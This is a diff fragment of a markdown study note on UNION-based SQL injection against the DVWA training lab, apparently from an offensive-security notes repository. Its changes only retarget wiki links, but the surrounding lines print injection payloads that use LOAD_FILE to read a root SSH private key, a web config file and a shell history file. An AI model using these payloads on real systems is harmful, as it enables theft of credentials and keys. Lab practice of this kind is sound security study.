U53RW4R3/SCPA/SCPA Phases/Tactics && Techniques && Procedures (TTPs) Phases/WebApp Hacking/Injection/SQL Injection/01 - In-Band SQL Injection/Lab Simulation/01 - DVWA/Difficulty/Low/Manual/03 - UNION Query SQL Injection/03 - OS Enumeration.md

 ' UNION SELECT NULL, LOAD_FILE('/root/.ssh/id_rsa')#
 ```

 - Retrieve database config file.
 You have to lookup of what web technology it's using such as, a **content management system (CMS)** like wordpress.
-Find the absolute path of the [[Credentials#^bc9e6e|database config file]] after enumeration phase for the web root directory.
+Find the absolute path of the [[Content Management System (CMS)#^bc9e6e|database config file]] after enumeration phase for the web root directory.

 ```sql
 ' UNION SELECT NULL, LOAD_FILE('/var/www/html/dvwa/config.php')#
 ```

 - Retrieve history commands.
-You can find more in the [[Credentials|privilege escalation credentials]] section.
+You can find more in the [[Content Management System (CMS)|privilege escalation credentials]] section.

 ```sql
 ' UNION SELECT NULL, LOAD_FILE('/home/<username>/.ssh/.bash_history')#